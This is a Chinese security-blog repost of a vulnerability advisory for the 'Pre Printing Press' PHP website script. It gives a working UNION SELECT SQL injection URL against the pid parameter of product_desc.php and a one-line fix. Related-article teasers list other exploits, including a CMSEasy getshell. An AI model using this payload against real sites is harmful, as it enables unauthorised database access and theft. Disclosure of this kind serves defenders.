网络优化

Pre Printing Press product_desc.php (pid) SQL注射漏洞及修复

2019-09-12 热度:770 ℃
标题: Pre Printing Press product_desc.php (pid) SQL Injection Vulnerability
基本: Pre Printing Press
售价: $999
脚本编写: PHP
状态: vulnerable
|致谢: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah
  证明
  [+] 概述
   A complete printing press website script contains all features required for online printing
   business. Developed in PHP, MYSQL and Flash AS3, with all browsers compatibility and easy
   to navigate. Package contains builtin designers to customize designs online, shopping cart
   and complete users and orders modules.Product is user friedly and can fully operate via
   secure admin panel.Script is fully customizable and ready to upload to start your printing
   press now.
  [+] 缺陷
    http://[host]/[path]/prestudio/product_desc.php?pid=[vul]
  [+] Injectable
    http:// [ www.it165.net ]/[path]/prestudio/product_desc.php?pid=1
    +union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1--+&cid=&sid=
  [+] 修复
 
过滤相应页面的参数输入

分享给朋友:

发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

相关文章

phpcms v9.3.2某管理模块逻辑校验漏洞及修复方案

phpcms v9.3.2某管理模块逻辑校验漏洞及修复方案

显示不全请点击全屏阅读 在文件\modules\sms\sms.php中:   class sms extends admin { function __co...

理解Like查询语句SQL注入 有效防范黑客入侵

理解Like查询语句SQL注入 有效防范黑客入侵

看《ibatis in action》,里面提到了使用like进行模糊查询的时候,会有注入漏洞。举例说明如下:   Xml代码  <select...

myssl提示“提示: 无法连接,耗时:”解决方案

myssl提示“提示: 无法连接,耗时:”解决方案

如是提示,请关闭系统防火墙,添加IP:54.223.130.50、52.80.69.196白名单,或直接放行。伍林堂安全应急响应中心...

代码审计:cmseasy(易通cms)xss配合csrf getshell 0day详解附利用exp

代码审计:cmseasy(易通cms)xss配合csrf getshell 0day详解附利用exp

celive/index.php 代码: $_SESSION['thislive'] = md5(time()); $_SESSION['thisli...

易想团购程序过滤不严导致SQL注入及解决方案

易想团购程序过滤不严导致SQL注入及解决方案

未作过滤导致注入     解决方案 过滤你懂得 作者:leehenwu...

window.open浏览器安全策略解析

window.open浏览器安全策略解析

window.open虽然在很多时候被广大中小站长用于弹窗广告的展示,所以广受争议,但是在业务需求中还是有很多场景需要用到此功能。然而,大多数浏览器对此都有一定的安全策略进行阻止,为此本...

非侵入式监控PHP应用性能监控分析

非侵入式监控PHP应用性能监控分析

前言所谓非侵入式监控PHP应用性能,就是不修改现有系统代码,而对系统进行监控。这样的系统才能更容易的应用到PHP应用中。这里抛砖引玉,欢迎大家交流。方案一如果只是监控每次请求的访问时间。...

SYN攻击防护措施

SYN攻击防护措施

SYN攻击的应对措施 针对SYN攻击的几个环节,提出相应的处理方法: 方式1:减少SYN-ACK数据包的重发次数(默认是5次): sysctl -w net.ipv4.tcp_sy...

解读Windows2003 Webshell默认权限

解读Windows2003 Webshell默认权限

0×00 前言 0×01 Windows2003默认配置 0×02 Windows2003典型配置的权限 0×03 cmd运行的条件...

防范dede商品十星级评分插件漏洞

防范dede商品十星级评分插件漏洞

漏洞一:存在于conn.php文件 文件代码如下: 1 <?php   2       ...

请先 登录 再评论,若不是会员请先 注册
我们检测到您可能使用 AdBlock 或者其他广告屏蔽插件,导致网页出现错位、变形以及丢失的情况,影响网站内容的阅读。
本站无任何商业广告!为了伍林堂平台的生存,恳请您能够理解,将伍林堂旗下交互产品加入白名单(方法点此),万分感谢!